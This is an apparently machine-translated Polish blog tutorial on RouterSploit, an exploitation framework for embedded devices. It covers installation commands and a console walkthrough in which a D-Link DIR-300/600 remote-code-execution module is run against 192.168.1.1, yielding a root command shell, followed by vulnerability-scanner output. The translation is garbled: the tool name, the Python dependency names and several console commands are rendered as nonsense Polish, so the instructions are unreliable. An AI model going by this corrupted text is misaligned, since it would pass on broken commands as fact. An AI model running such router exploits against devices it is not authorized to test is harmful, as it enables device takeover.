Dom » Narzędzia Linuksa » Rozdzielacz routera – Kompletny samouczek dotyczący platformy eksploatacji [2020]

Rozdzielacz routera – Kompletny samouczek dotyczący platformy eksploatacji [2020]

przez Suyash
routersploit

Rozdzielacz routera to niesamowita platforma eksploatacyjna stworzona specjalnie dla urządzeń wbudowanych.

Narzędzie to może być używane przez pentester do skanowania bezpieczeństwa kamer i routerów.

Najważniejsze informacje o RouterSploit:

  • Zakodowane w Pythonie.
  • Interfejs wiersza poleceń.
  • Obsługa Dockera.
  • Narzędzia modułowe.

Obsługiwany system operacyjny:

  1. System operacyjny Mac.
  2. Linuks.
  3. Telefon z Androidem.
  4. Okna.

Instalowanie RouterSploita:

Wymagania:

  • przyszły
  • upraszanie
  • Paramiczny
  • zatrzymywać się
  • szyfrowanie

Fakultatywny:

  • niebieski – Bluetooth o niskim zużyciu energii

Instalacja w Kali Linux:

Wykonaj poniższe polecenia:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Obsługa technologii Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Instalacja w Ubuntu:

Wykonaj poniższe polecenia:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Obsługa technologii Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Instalacja na MacOS:

Wykonaj poniższe polecenia:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Instalacja na Dockerze:

Wykonaj poniższe polecenia:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Jak zaktualizować RouterSploit?

Aby uniknąć niedogodności, musisz często aktualizować RouterSploit.

Nowe moduły są wysyłane niemal codziennie.

cd routersploit
git pull

Jak korzystać z RouterSploit?

Stosowanie

root@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \_____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Ramy eksploatacji dla    |_|   przez Threat9
            Urządzenia wbudowane
  
 Nazwa kodowa   : Wiedziałem, że sprawiasz kłopoty
 Wersja    : 3.3.0
 Strona główna   : https://www.threat9.com/ - @zagrożeniedziewiąta
 Dołącz do Slacka : routersploit.slack.com

 Dołącz do programu beta Threat9 - https://www.threat9.com/

 Exploity: 128 Skanery: 4 Kredyty: 165 Ogólny: 4 Ładunki: 32 Kodery: 6

rsf >

Exploity:

Aby przeprowadzić Eksploatację, po prostu wybierz moduł i ustaw cel:

rsf > użyj exploitów/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > użyj exploitów/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Aby zakończyć, użyj klawisza Tab.

Aby wyświetlić opcje, typshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > pokaż opcje

Opcje docelowe:


   Nazwa Aktualne ustawienia Opis                                
   ----       ----------------     -----------                                
   target Adres docelowy np. http://192.168.1.1     
   port       80                   Port docelowy

Używaćrun Lubexploit rozkaz wykorzystania celu:

rsf (D-LINK DIR-300 & DIR-600 RCE) > uruchomić
[+] Cel jest bezbronny
[*] Wywoływanie pętli poleceń...
cmd > whoami
korzeń

Aby ustawić opcje:

rsf (D-LINK DIR-300 & DIR-600 RCE) > ustaw docelowy http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Można sprawdzić, czy cel jest podatny na konkretny exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > sprawdzać
[+] Cel jest bezbronny

Uruchomićshow info aby wyświetlić informacje o exploitie.

Skanowanie w poszukiwaniu wrażliwych celów:

Skanery pozwalają szybko sprawdzić, czy cel jest podatny na ataki.

Użyj tych samych poleceń, aby wyświetlić/ustawić opcje, a także biegać.

rsf (Skaner D-Link) > uruchomić
[+] exploits/dlink/dwr_932_info_disclosure jest podatny na ataki
[-] exploits/dlink/dir_300_320_615_auth_bypass nie jest podatny na ataki
[-] exploits/dlink/dsl_2750b_info_disclosure nie jest podatny na ataki
[-] exploits/dlink/dns_320l_327l_rce nie jest podatny na ataki
[-] exploits/dlink/dir_645_password_disclosure nie jest podatny na ataki
[-] exploits/dlink/dir_300_600_615_info_disclosure nie jest podatny na ataki
[-] exploits/dlink/dir_300_600_rce nie jest podatny na ataki

[+] Urządzenie jest podatne na ataki!
- exploity/dlink/dwr_932_info_disclosure

Oficjalny routerSploit

Przeczytaj także: 1337x proxy

Ostatnie słowa:

Rozdzielacz routera to niesamowite narzędzie do wykorzystania.

Jeśli napotkasz jakiekolwiek problemy dotyczące Rozdzielacz routera. Pamiętaj, aby skomentować poniżej. Nasz zespół CSHAWK skontaktuje się z Tobą najszybciej jak to możliwe.

Zostaw komentarz